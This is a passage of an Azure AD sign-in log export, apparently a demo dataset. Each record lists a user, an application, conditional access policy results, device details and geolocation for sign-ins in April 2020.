['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8046174b-712f-40d9-9f4e-13cdaefa1000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8046174b-712f-40d9-9f4e-13cdaefa1000,SigninLogs,Sucess,33.0175209,35.44601059
+1920,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:12.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9fba19d3-5823-4cb3-8b12-d004696ee444,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbffb959-9fbe-4abe-95ed-0d85adda1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,cbffb959-9fbe-4abe-95ed-0d85adda1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1921,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:00.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,12261820-60d8-43a4-9e6c-b7d1a6f69a33,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e82050b8-a2c4-426d-8c05-8f1d2e841100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e82050b8-a2c4-426d-8c05-8f1d2e841100,SigninLogs,Sucess,33.7984581,-84.38828278
+1922,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",61a2605b-1788-437f-91b8-6fba4a3a2c00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,61a2605b-1788-437f-91b8-6fba4a3a2c00,SigninLogs,Sucess,51.4458313,-0.969720006
+1923,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,317e1e4d-933b-439b-9385-7eda13d1e20e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",89223cb6-60af-4a3e-b2e1-947072a21000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,89223cb6-60af-4a3e-b2e1-947072a21000,SigninLogs,Sucess,36.6404686,-78.26995087
+1924,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:41.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,024fdd65-4acf-46c4-8e97-aaced536e2c0,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:09,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Edge 18.1836', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",66fdeef6-ead5-4b0f-bead-ff47fb231800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],{'errorCode': 0},Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,66fdeef6-ead5-4b0f-bead-ff47fb231800,SigninLogs,Sucess,29.4803009,-81.21395111
+1925,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:29.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6df5a33c-9d86-48d0-8fc8-59d124d0a459,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",99476ccd-67d1-454b-a7cf-079e8a841100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,99476ccd-67d1-454b-a7cf-079e8a841100,SigninLogs,Sucess,33.7984581,-84.38828278
+1926,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:38.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,83defa04-83b7-4f83-a13f-a63c03ecb518,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",99476ccd-67d1-454b-a7cf-079ec0851100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,99476ccd-67d1-454b-a7cf-079ec0851100,SigninLogs,Sucess,33.7984581,-84.38828278
+1927,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:39.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6fc7469f-4055-0000-4704-a13c2b240120,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, 